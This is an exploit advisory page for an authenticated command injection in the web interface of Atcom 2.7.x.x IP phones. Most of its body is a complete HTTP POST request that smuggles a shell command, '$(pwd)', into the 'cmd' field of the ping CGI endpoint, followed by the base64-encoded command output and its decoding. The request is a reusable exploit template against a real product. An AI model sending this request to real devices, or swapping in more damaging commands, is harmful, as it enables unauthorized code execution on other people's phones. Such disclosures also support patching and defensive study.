Atcom 2.7.x.x Command Injection

2023.10.10
Credit: Mohammed Adel
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection # Google Dork: N/A # Date: 07/09/2023 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.atcom.cn/ # Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html # Version: All versions above 2.7.x.x # Tested on: Kali Linux Exploit Request: POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1 Host: {TARGET_IP} User-Agent: polar Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here" cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping Response: {"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"} The value of "ping_cmd_result" is encoded as base64. Decoding the value of "ping_cmd_result" reveals the result of the command executed as shown below: ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top